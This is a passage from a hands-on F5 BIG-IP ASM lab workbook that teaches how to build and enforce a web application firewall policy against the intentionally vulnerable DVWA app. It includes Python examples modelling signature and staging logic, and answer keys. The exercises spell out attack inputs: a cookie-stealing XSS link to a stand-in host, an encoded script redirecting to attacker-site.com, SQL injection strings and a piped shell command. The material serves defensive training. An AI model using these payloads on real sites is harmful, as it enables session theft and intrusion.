submitted into the web page form fields for input validation.
− Click the name parameter.
While a parameter has a type of Ignore value, there are no other configurable attributes.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > auto build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility return to the Parameters List page.
All (or most) parameters now have a Parameter Value Type of User-input value. This attribute was modified by
the automatic policy builder.
− Click the name parameter.
* The Data Type has been changed to Alpha-Numeric.
* The Maximum Length value is set to 10 (it also may be 100). This isn’t long enough for this parameter, so we’ll
wait for more traffic samples.

− Open the Value Meta Characters tab and scroll down to view the Global Security Policy Settings list.

By default, certain keyboard characters are disallowed in user-input value parameters. However, some of these
disallowed keyboard characters are expected to be input by users into this parameter, so we’ll wait for more
traffic samples.

The security policy has been created with all required file types, URLs, and parameters, but these entities aren’t
yet enforced. BIG-IP ASM needs more requests to complete the security policy, also known as stabilizing the
security policy.

Task 2 – Update the Policy Building Learning Speed


To simulate more traffic over time for building the security policy, adjust the learning speed settings.

− Open the Learning and Blocking Settings page, then at the bottom of the page expand the Loosen Policy,
Tighten Policy (stabilize), and Minimize false positives (Track Site Changes) sections.
− In the Loosen Policy section update the values as follows:

→NOTE: Don’t worry that the two modified values are displayed in red with error messages. The error
messages will disappear shortly. Also, .0001 days is about 9 seconds.

− In the Tighten Policy (stabilize) section update the values as follows:

− In the Minimize false positives (Track Site Changes) section update the values as follows:

By lowering these values, you can create and stabilize a security policy at a much more rapid rate when
using trusted requests.
− Click Save, and then click Apply Policy.

Task 3 – Use Learning Suggestions to Stabilize the Security Policy


Use a Firefox iMacro to simulate several requests over time to stabilize dvwa_security_policy.

− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
This macro simulates several requests submitting data into different parameters.
− In the Configuration Utility open the Allowed File Types page.
Notice the following:
* A new file type has been added to the list (pdf).
* The wildcard (*) entry is no longer on the list. This means that BIG-IP ASM considers this list complete,
however it’s still open to learning new file types to add to the list.
* Several file types are no longer in staging, which means BIG-IP ASM will enforce the length limits.
* The query string length limit for the no_ext file type was changed to 2048. This is due to user requests that
exceeded the default 1000 length limit, and therefore BIG-IP ASM adjusted this attribute.
− Open the Parameters List page.
There are a couple of new parameters (ip and submit, which will be on Page 2 of the entries) for the
/vulnerabilities/exec URL that are set to Ignore value. Many of the other parameters are no longer in staging.

While the different file types and parameters are still in staging, the security policy is not yet stabilized.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Application Security > Audit > Log page.
This page displays all the changes made to a security policy, either by an administrator or the policy builder.
− From the Element Type list select Parameter, and then from the Event Type list select Add.
You can see all new element types that were added, such as all new parameters.
− From the Event Type list select Update.

− Click Show Filter Details.
− In the Element Name field enter mtxMessage, and then click Go.
You can see all the modifications for any specific security policy element type, such as
the mtxMessage parameter.
− Click Reset, and then from the Element Type list select Apply Policy.
You can see every time the security policy was applied, either manually by an administrator
(Component column > GUI) or automatically by the policy builder (Component column > System).

− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Allowed File Types page.
All file types are no longer in staging, which means they are enforced. The allowed file types list is now stable.
Any user requests that are longer than the configured length values will be considered illegal requests and may
be blocked by BIG-IP ASM.
− Open the Allowed URLs page and examine both pages of URLs.
All URLs except for /vulnerabilities/sqli (on Page 2) are now enforced. The allowed URLs list is nearly stabilized.
− Open the Parameters List page.
Nearly all parameters except for the Submit and id parameters for the /vulnerabilities/sqli URL are now
enforced. The parameters list is also nearly stabilized.
− Click the name parameter.
Notice that the name parameter is enforced (no longer in staging) and now has a Maximum Length value of 500,
which is a sufficient length for this parameter.

→NOTE: If the name parameter Maximum Length isn’t set to 500 and also enforced, use a New private window
in Firefox and run the stabilize policy.iim macro again, and then re-check the name parameter.

− Open the Value Meta Characters tab.

Four meta characters have been added as allowed characters for this parameter. This was based on the values
that were submitted using the macro.
− Open the Policies List page and click dvwa_security_policy.
− For Policy Building Learning Mode click Disabled, and then click Save.
As the security policy is nearly stable, you’re going to disable any new policy learning.
− Open the Allowed File Types page.
We have decided to not keep the Query String Length value of 2048 for the no_ext file type.
− Click no_ext, then change the Query String Length value to 1500, then click Update, and then click Apply Policy.

Task 4 – Examine File Type and Parameter Enforcement


Identify the behavioral difference between non-enforced entities (file types and parameters) and enforced entities.

− Open a new Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.
− Copy and paste the following into the URL field and press Enter. (NOTE: Use the copy and paste guide inside
the Documents directory.)
http://10.1.10.35/vulnerabilities/xss_s/?mtxMessage=GLOBALWIN+Women's+1730+Waterproof+Winter+Boots.+Size:+My+shoe+size+is+8.5,+so+I+ordered+this+GLOBANWIN+winter+boots+size+8.5.+it+is+perfectly+fit+to+my+feet.+It+does+not+squeeze+at+all.+It+has+a+right+amount+of+room+for+wearing+thin+2+socks+or+one+thick+winter+socks+to+keep+your+feet+warm+in+cold+weather.+Design:+it+is+13+inches+long,+so+it+comes+to+your+middle+thigh+area.+The+synthetic+fur+makes+the+winter+boots+stylish+and+warm.+Especially+it+warm+along+with+your+shin+area+and+around+middle+thigh+area+where+fur+is+insulted.+3+inches+nylon+study+material+in+the+bottom+of+the+winter+boots+prevent+your+feet+wet+from+rain+and+snow.+Insolation+inside:+insolated+with+the+right+amount+of+thick+materials,+so+it+is+not+too+warm+or+cold.+There+are+two+things+I+would+not+like+about+these+boots+are+first+the+fur+is+falling+out+a+little+amount+of+fur+each+time+I+scab+off+and+brush+off+them+with+my+fingers.+But+I+think+that+is+a+normal+thing+happened+to+any+winter+boots.+The+boot+itself+sits+just+below+the+widest+part+of+the+calf+muscle,+but+there's+some+"give"+there+to+the+width,+so+it+doesn't+just+have+to+be+over+your+basic+skinny+jeans/leggings,+I+can+slip+them+on+over+thick+sweat+pants+when+I+drop+my+kids+off+at+school,+or+over+thick+work+jeans+when+feeding/watering+animals,+But+I+also+wore+them+to+a+farmers+market+with+a+tied+up,+double+layered+sari+skirt+over+leggings+(it's+been+a+cold+season).+Excellent+versatility.+Please+let+me+know+when+there+is+an+upgrade.&txtName=I+can't+speak+highly+enough+about+this+product!#

Questions:
Was the request allowed or blocked? __________________

Why did you get this result? ____________________________________________________

− Copy the support ID number of the blocked request.


− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the Open Filter icon, then paste the value you copied into the Support ID field, and then click Apply Filter.
− Under Occurrences click 1.

The request was blocked because it violated the query string length value of 1500.
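To make the file type check concrete, the following is an added example in Python; it is not code from the F5 lab guide or from BIG-IP itself, but a simplified model of what an Allowed File Types entry does. Each entry carries the four length attributes seen on the Allowed File Types page (URL, request, query string and POST data length) plus a staging flag; a request for a file type not on the list is legal only while the wildcard (*) entry remains. The way the file type is derived from the path, the limits other than the 1500 used in this task, the sample headers and the 1600-character query string are all constructed for the example, and measuring URL length on the path alone is an assumption about how ASM counts it.

```python
"""Simplified model of BIG-IP ASM Allowed File Types enforcement (added example, not F5 code)."""
from dataclasses import dataclass
from typing import Dict
from urllib.parse import urlsplit


@dataclass
class FileType:
    # The four length attributes shown for each entry on the Allowed File Types page.
    url_length: int
    request_length: int
    query_string_length: int
    post_data_length: int
    staging: bool = False  # while staged, a violation is logged but does not block


def file_type_of(path: str) -> str:
    """Extension of the last path segment, or no_ext when there is none (e.g. /dir/).

    Assumed derivation rule for the example; ASM's own rule is applied internally.
    """
    last_segment = path.rsplit("/", 1)[-1]
    if "." in last_segment and not last_segment.endswith("."):
        return last_segment.rsplit(".", 1)[1].lower()
    return "no_ext"


def check_request(method: str, target: str, headers: str, body: str,
                  allowed: Dict[str, FileType]) -> dict:
    """Return the file type, the violations raised, and whether the request blocks."""
    parts = urlsplit(target)
    ftype = file_type_of(parts.path)
    result = {"file_type": ftype, "violations": [], "blocked": False}

    # A type missing from the list is legal only while the wildcard (*) entry remains;
    # once * has been deleted the request is an Illegal file type.
    entry = allowed.get(ftype) or allowed.get("*")
    if entry is None:
        result["violations"].append("Illegal file type")
        result["blocked"] = True
        return result

    request_line = f"{method} {target} HTTP/1.1\r\n"
    checks = [
        ("Illegal URL length", len(parts.path), entry.url_length),  # path only (assumption)
        ("Illegal query string length", len(parts.query), entry.query_string_length),
        ("Illegal POST data length", len(body), entry.post_data_length),
        ("Illegal request length", len(request_line) + len(headers) + len(body), entry.request_length),
    ]
    for violation, measured, limit in checks:
        if measured > limit:
            result["violations"].append(violation)
    # Staged entities are learned from, not enforced: only an enforced entry blocks.
    result["blocked"] = bool(result["violations"]) and not entry.staging
    return result


# Constructed policy state after Task 3: * removed, no_ext query string limit set to 1500.
# Limits other than 1500 are illustrative values, not ASM defaults.
ALLOWED = {
    "no_ext": FileType(url_length=100, request_length=5000, query_string_length=1500, post_data_length=1000),
    "php": FileType(url_length=100, request_length=5000, query_string_length=1000, post_data_length=1000),
}
# Constructed stand-in for the long product review submitted in this task (1648 characters).
LONG_REVIEW_QUERY = "mtxMessage=" + "x" * 1600 + "&txtName=I+can't+speak+highly+enough"
HEADERS = "Host: 10.1.10.35\r\nUser-Agent: example\r\n\r\n"  # constructed sample headers

if __name__ == "__main__":
    for target in ("/vulnerabilities/xss_s/?" + LONG_REVIEW_QUERY,
                   "/vulnerabilities/xss_s/?mtxMessage=short",
                   "/php.ini"):
        print(target[:48], check_request("GET", target, HEADERS, "", ALLOWED))
```

Running the block reproduces the three outcomes seen in this lesson: the long review is blocked for query string length, a short request to the same URL passes, and php.ini is an Illegal file type now that the wildcard is gone. Flipping `staging=True` on the no_ext entry turns the first result into a logged-only violation, which is the difference between a staged and an enforced entity.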
− In the blocked page click the DVWA bookmark, then click XSS reflected, then type ASM is 100% amazing into
the field, and then click Submit.

Questions:
Was the request allowed or blocked? __________________

Why did you get this result? ____________________________________________________

− Copy the support ID value, then in the Configuration Utility click the Open Filter icon, then paste the new
support ID value, and then click Apply Filter.
− Under Occurrences click 1.
The request was blocked because it violated the Illegal meta character in value violation. It included the
percent character (%) in the name parameter, which isn’t on the allowed meta characters list for this parameter.
− In the blocked page click the DVWA bookmark, then click XSS reflected, then copy and paste the following in
the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

The cross-site scripting attempt is blocked by BIG-IP ASM.


− Click the DVWA bookmark, then click SQL Injection, then copy and paste the following in the User ID field,
and then click Submit.
%' or 1='1

Questions:
Was the SQL injection request allowed or blocked? __________________

Do we want the SQL injection request allowed or blocked? __________________

− Right-click inside the field and select Inspect Element, and then examine the parameter name value.

The name of this parameter is id.


− Close the inspection window, and then examine the current URL.
The URL you’re on is /vulnerabilities/sqli/.
− In the Configuration Utility open the Parameters List page and examine the id parameter for
the /vulnerabilities/sqli/ URL.

Questions:
Why did an attack on the id parameter have a different result than an attack against
the name parameter?

________________________________________________________________________

− Select the checkbox for the id parameter for the /vulnerabilities/sqli/ URL, and then click Enforce and
then OK, and then click Apply Policy.

The id parameter is no longer in staging and is now enforced.


− In the DVWA page reload the SQL Injection page, and then close the blocked page.
The SQL Injection attempt is now blocked by BIG-IP ASM.
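The parameter side of this task, where the enforced name parameter blocked a percent sign while the staged id parameter let a SQL injection through, can be modelled the same way. The following is an added example in Python, not code from the F5 lab guide or from BIG-IP: a parameter entity carries a value type (Ignore value or User-input value), a data type, a maximum length, an allowed meta character set and a staging flag, and a request's parameters are matched URL-level first, then global, then the wildcard. The specific allowed meta characters, the maximum length of id and the rule that letters, digits and spaces always pass are assumptions made for the example; ASM's real meta character table and its attack signatures (covered in the next lesson) are not modelled.

```python
"""Simplified model of BIG-IP ASM parameter enforcement and staging (added example, not F5 code)."""
from dataclasses import dataclass, replace
from typing import List, Optional
from urllib.parse import parse_qs


@dataclass(frozen=True)
class Parameter:
    name: str                       # "*" is the wildcard entry
    url: Optional[str]              # URL-level parameter, or None for a global one
    value_type: str                 # "ignore" or "user-input"
    data_type: str = "alpha-numeric"
    max_length: Optional[int] = None
    allowed_metachars: frozenset = frozenset()
    staging: bool = True            # staged: violations are logged but never block


def lookup(params: List[Parameter], name: str, url: str) -> Optional[Parameter]:
    """Most specific match wins: URL-level entry, then global entry, then wildcard."""
    for want_url, want_name in ((url, name), (None, name), (None, "*")):
        for p in params:
            if p.name == want_name and p.url == want_url:
                return p
    return None


def value_violations(param: Parameter, value: str) -> List[str]:
    """Violations a single value raises against its parameter entity."""
    if param.value_type == "ignore":
        return []  # Ignore value: nothing about the content is checked
    found = []
    if param.max_length is not None and len(value) > param.max_length:
        found.append("Illegal parameter value length")
    if param.data_type == "integer" and not value.isdigit():
        found.append("Illegal parameter data type")
    # Assumed model of the Value Meta Characters check: letters, digits and spaces
    # always pass; any other character must be on this parameter's allowed list.
    if any(not (c.isalnum() or c == " ") and c not in param.allowed_metachars for c in value):
        found.append("Illegal meta character in value")
    return found


def check_parameters(url: str, query: str, params: List[Parameter]) -> List[dict]:
    """Evaluate every submitted parameter; only enforced (non-staged) entities block."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        p = lookup(params, name, url)
        if p is None:  # no entry and no wildcard left: the parameter itself is illegal
            findings.append({"param": name, "value": None,
                             "violations": ["Illegal parameter"], "blocked": True})
            continue
        for value in values:
            v = value_violations(p, value)
            findings.append({"param": name, "value": value, "violations": v,
                             "blocked": bool(v) and not p.staging})
    return findings


# Constructed policy state at the point of Task 4: name is enforced, id is still staged.
# The allowed meta characters and id's maximum length are assumed values.
POLICY = [
    Parameter("name", "/vulnerabilities/xss_r/", "user-input", max_length=500,
              allowed_metachars=frozenset("'!,."), staging=False),
    Parameter("id", "/vulnerabilities/sqli/", "user-input", max_length=10, staging=True),
    Parameter("ip", "/vulnerabilities/exec/", "ignore"),
    Parameter("*", None, "user-input", staging=True),
]
# Form submissions from this task, URL-encoded as the browser sends them (constructed).
XSS_QUERY = "name=ASM+is+100%25+amazing&Submit=Submit"          # "ASM is 100% amazing"
SQLI_QUERY = "id=%25%27+or+1%3D%271&Submit=Submit"               # "%' or 1='1"

if __name__ == "__main__":
    print(check_parameters("/vulnerabilities/xss_r/", XSS_QUERY, POLICY))
    print(check_parameters("/vulnerabilities/sqli/", SQLI_QUERY, POLICY))
    enforced = [replace(p, staging=False) if p.name == "id" else p for p in POLICY]
    print(check_parameters("/vulnerabilities/sqli/", SQLI_QUERY, enforced))
```

The three printed results mirror the lesson: the percent sign in the name value is an illegal meta character on an enforced parameter and blocks; the same class of violation on the staged id parameter is recorded but the request goes through; and once id is taken out of staging with `replace(p, staging=False)` the injection blocks. A parameter with value type Ignore value, such as ip here, raises nothing no matter what is submitted, which is why the automatic policy builder's switch to User-input value matters.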


PREPARE FOR NEXT EXERCISE


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit

Question and Answer Key


Task 4 – Examine File Type and Parameter Enforcement
Q: Was the request allowed or blocked?
A: Blocked

Q: Why did you get this result?


A: The query string value was longer than 1500 characters.

Q: Was the request allowed or blocked?


A: Blocked

Q: Why did you get this result?


A: It contained an illegal metacharacter (%).

Q: Was the SQL injection request allowed or blocked?


A: Allowed

Q: Do we want the SQL injection request allowed or blocked?


A: As an SQL injection attack, it should have been blocked.

Q: Why did an attack on the id parameter have a different result than an attack against
the name parameter?
A: The name parameter is enforced (no longer in staging), while the id parameter is still in staging
and not yet being enforced.


ASM Lesson 5 – Attack Signatures

NOTES



Exercise – Use ASM Attack Signatures


• Estimated completion time: 45 minutes.

Task 1 – Create a New Security Policy


Create a security policy for dvwa_virtual, and then add additional signature sets to the security policy.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } rules { several_regions } security-log-profiles add { "Log all requests" } pool dvwa_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual, and then open the Resources page.
− In the iRules section click /Common/several_regions.
This iRule was added to the virtual server using the TMSH command. This iRule will simulate each client request
coming from a unique worldwide IP address.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking

− Once the policy is created click dvwa_security_policy.


− Under the Advanced settings, for Trust XFF Header select the Enabled button, and then click Save.

This setting will enable BIG-IP ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− Under Security Policy Configuration click Attack Signatures.

Question:
How many signatures are currently attached to the security policy? __________________

− Under Security Policy Configuration click General Settings.


− In the Advanced Settings section, in the Server Technologies field, begin typing Apache Tomcat, then once it
displays select it, and then click Confirm.

− Repeat this process for the following:
o MySQL
o PHP
o Unix/Linux
− Click Save, and then click Attack Signatures again.

Question:
How many signatures are now attached to the security policy? __________________

− Open the Application Security > Policy Builder > Learning and Blocking Settings page, and then
expand Attack Signatures.
The security policy includes generic detection signatures along with custom signatures that apply to the
web application that you just configured.
− Click Change.
− Select the Low Accuracy Signatures, Command Execution Signatures, Cross Site Scripting Signatures,
Other Application Attacks Signatures, and SQL Injection Signatures checkboxes, and then click Change.
− Click Save, and then return to the Attack Signatures page for dvwa_security_policy.

Question:
How many signatures are now attached to the security policy? __________________

− Click the filter icon.


− For Attack Type select SQL-Injection.
− Select the Advanced tab, then for Accuracy select Medium, and then click Apply Filter.

Question:
How many signatures are displayed in this filter? __________________

− Click Apply Policy.

Task 2 – Use Signature Violations to Enforce Attack Signatures


Submit several attacks against the DVWA web application, then use the violations to enforce specific attack
signatures, and then attempt the attacks again and examine how and why they are blocked.

− Open a Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.
− Click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

You have exposed the contents of the /etc directory on the web server. Using command execution, you can
retrieve confidential files on the web server. The goal of command execution attacks is to be able to run arbitrary
commands on the target host operating system.
− Click SQL Injection, then copy and paste the following in the User ID field, and then click Submit:
$username = 1' or '1' = '1

− Click XSS reflected, then copy and paste the following in the field, and then click Submit.
<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

− Click XSS stored, then create a guestbook entry named Encoding, then copy and paste the following Review,
and then click Submit Review.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

This attempt is trying to hide the attack string by encoding the malicious code within the request.
− In the Configuration Utility open the Application Security > Policy Builder > Traffic Learning page.
− On the right-side of the page, examine the Enforcement Readiness Summary section.
− Select the number of signatures that are not enforced but have suggestions.

This navigates us to the Attack Signatures page with only the triggered signatures selected.
These attack signatures need to be enforced to block requests that match the signatures.
− Select the Select all signatures checkbox, and then click Enforce, and then click Enforce again.

− Once the security policy has finished loading click the filter icon, then from the Status list select Enforced,
and then click Apply Filter.

At any time, you can see all attack signatures that have been enforced for a security policy.
− Click Apply Policy.

− In the DVWA page click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

The command execution attack is now blocked by BIG-IP ASM.


− Click the DVWA bookmark, then click SQL Injection, then copy and paste the following in the User ID field,
and then click Submit.
$username = 1' or '1' = '1

The SQL Injection attack is now blocked by BIG-IP ASM.


− Click the DVWA bookmark, then click XSS reflected, then copy and paste the following in the field, and then
click Submit.
<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

− Click the DVWA bookmark, then click XSS stored, then create a guestbook entry named Encoding, then copy and
paste the following Review, and then click Submit Review.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

Both cross-site scripting attacks are now blocked by BIG-IP ASM.


− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are four blocked log entries.
− Select the log entry for /vulnerabilities/exec/ and under Occurrences click 2, and then scroll down to view the
matched attack signature.

− Examine the Violation Rating and Attack Types values.

This request was blocked because it matched the enforced command execution attack signature.
− Select the /vulnerabilities/sqli/ log entry and under Occurrences click 3 to view the different matched
attack signatures.
− Select the /vulnerabilities/xss_s/ log entry and scroll down to examine both the Original Request
and Decoded Request sections.
The encoded request was decoded by BIG-IP ASM to identify the matched attack signatures.

− In the DVWA page click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then copy
and paste the following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

Questions:
Was the request allowed or blocked? __________________

Do we want this request allowed or blocked? __________________

Why didn’t BIG-IP ASM use an attack signature to block this request? ___________________

____________________________________________________________________________

− In the Configuration Utility open the Traffic Learning page, and then in the Enforcement Readiness Summary
section select the number of signatures that are not enforced but have suggestions.
− Select the Select all signatures checkbox, then click Enforce and click Enforce again, and then click Apply Policy.
− In the DVWA page, click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then paste
the following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

The iFrame-based cross-site scripting attack is now blocked by BIG-IP ASM.


− Click the DVWA bookmark, then click Setup, and then click Create / Reset Database.

Task 3 – Create a Custom Signature


Due to a new attack threat, create a custom signature so BIG-IP ASM can block requests using the new attack string.

− In the DVWA page click XSS reflected, then copy and paste the following in the field, and then click Submit.
<new attack string: chumbawamba>

This new attack string is not blocked, as BIG-IP ASM doesn’t have an attack signature for this new attack.
− In the Configuration Utility open the Traffic Learning page, and then examine
the Enforcement Readiness Summary section.
There are no new triggered signatures, because BIG-IP ASM doesn’t yet have a signature for this new attack.
− Open the Security > Options > Application Security > Attack Signatures > Attack Signature List page and
click Create.
− Configure the custom attack signature using the following information, and then click Create. (NOTE: Use the copy
and paste guide inside the Documents directory.)
Name "%.Chumbawamba" access (parameter)
Attack Type Other Application Attacks
Rule Click Add
Request Content > contains string > chumbawamba

− Open the Security > Options > Application Security > Attack Signatures > Attack Signature Sets page and
click Other Application Attacks Signatures.
Notice this is a Filter-based signature set. It’s configured to filter (and use) all signatures with the Attack Type
of Other Application Attacks.
− Examine the Signatures section.
Because we identified the custom signature with Other Application Attacks, it’s automatically included within
this signature set, and remember that we added this signature set in Task 1.
− In the DVWA page click the DVWA bookmark, then click XSS stored, then create an entry named Attack, then copy
and paste the following Review, and then click Submit Review.
<new attack string: chumbawamba>

Question:
Why wasn’t this request blocked? __________________

− In the Configuration Utility open the Traffic Learning page, then in the Enforcement Readiness Summary section
select the number of signatures that are not enforced but have suggestions.
− Select the custom signature checkbox, then click Enforce and click Enforce again, and then click Apply Policy.
− In the DVWA page click the DVWA bookmark, then click XSS reflected, then paste the following in the field and
click Submit.
<new attack string: chumbawamba>

− Click the DVWA bookmark, then click Command Execution, then paste the following in the field and click Submit,
and then close the blocked page.
<new attack string: chumbawamba>

This new attack string is now blocked by BIG-IP ASM on all parameters.
− In the Configuration Utility open the Event Logs > Application > Requests page and select the log entry
for /vulnerabilities/exec/, and then under Occurrences click 1 and view the matched attack signature.
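To make the decode-then-match behaviour of Task 2 and the staging-versus-enforced distinction of Tasks 2 and 3 concrete, here is an added Python model. It is example code written for this workbook, not part of BIG-IP ASM or the lab files; the signature names, attack types, regular expressions, sample requests and parameter names are all constructed for illustration.

```python
"""
Constructed example (not F5's code): a minimal model of how a WAF matches attack
signatures against a decoded request, with the staging-versus-enforced state that
Task 2 and Task 3 walk through. Signature names, attack types, regular expressions
and sample requests are all made up for illustration.
"""
import re
from dataclasses import dataclass, replace
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlsplit


@dataclass(frozen=True)
class Signature:
    name: str
    attack_type: str
    pattern: str            # applied to the decoded value of the URL and each parameter
    enforced: bool = False  # False = staging: a match is logged as a suggestion, not blocked


# Constructed signatures mirroring the payload classes used in this exercise.
SIGNATURES = [
    Signature("Shell command after pipe", "Command Execution", r"\|\s*\w+"),
    Signature("OR tautology in quotes", "SQL-Injection", r"'\s*or\s*'"),
    Signature("<script> tag", "Cross Site Scripting", r"<\s*script\b"),
    Signature("<iframe> tag", "Cross Site Scripting", r"<\s*iframe\b"),
    Signature("onclick handler", "Cross Site Scripting", r"\bonclick\s*="),
    # The custom signature of Task 3: Request Content contains string.
    Signature("chumbawamba", "Other Application Attacks", r"chumbawamba"),
]


def signature_set(signatures, attack_type):
    """Filter-based signature set: every signature with this attack type."""
    return [s for s in signatures if s.attack_type == attack_type]


def enforce(signatures, names):
    """Move the named signatures out of staging (Enforce in the Readiness Summary)."""
    return [replace(s, enforced=True) if s.name in names else s for s in signatures]


def decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded payload is still visible."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def request_values(url, body=""):
    """Split a request into the URL path and every parameter value it carries."""
    parts = urlsplit(url)
    values = [parts.path]
    values += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    return [decode(v) for v in values]


def inspect(url, body, signatures):
    """Return ('block' | 'alarm' | 'allow', sorted names of matched signatures).

    A request is blocked only if at least one *enforced* signature matched; a
    match on a staging signature is recorded as a suggestion (alarm) and the
    request is let through, which is what Tasks 2 and 3 observe.
    """
    matched = [s for v in request_values(url, body)
               for s in signatures if re.search(s.pattern, v, re.IGNORECASE)]
    names = sorted({s.name for s in matched})
    if not matched:
        return "allow", names
    if any(s.enforced for s in matched):
        return "block", names
    return "alarm", names


if __name__ == "__main__":
    # Stored XSS review as the browser submits it: the pasted text is percent-
    # encoded once more on the way out, so the server sees "%253c%2573...".
    hidden = "index.php?name=%3c%73%63%72%69%70%74%3e"   # decodes to "<script>"
    body = "review=" + quote_plus(hidden)                 # "review" is a constructed field name
    print(inspect("/vulnerabilities/xss_s/", body, SIGNATURES))  # staging: alarm only
    armed = enforce(SIGNATURES, {"<script> tag"})
    print(inspect("/vulnerabilities/xss_s/", body, armed))       # enforced: block
```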

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit


Question and Answer Key


Task 1 – Create a Security Policy
Q: How many signatures are currently attached to the security policy?
A: Answers will vary, but it should be around 2,250.

Q: How many signatures are now attached to the security policy?


A: Answers will vary, but it should be near 3,200.

Q: How many signatures are now attached to the security policy?


A: Answers will vary, but it should be near 5,250.

Q: How many signatures are displayed in this filter?


A: Answers will vary, but it should be over 250.

Task 2 – Use Signature Violations to Enforce Attack Signatures


Q: Was the request allowed or blocked?
A: Allowed

Q: Do we want this request allowed or blocked?


A: Blocked

Q: Why didn’t BIG-IP ASM use an attack signature to block this request?
A: The attack signature for this attack hasn’t been enforced yet.

Task 3 – Create a Custom Signature


Q: Why wasn’t this request blocked?
A: It isn’t enforced yet.


ASM Lesson 6 – Brute Force Protection

NOTES



Exercise – Use Brute Force Protection


• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy


Create a security policy for hackazon_virtual using the automatic policy builder.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool hackazon_pool members add { 10.1.20.20:80 { address 10.1.20.20 } }
tmsh create ltm virtual hackazon_virtual destination 10.1.10.43:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool hackazon_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
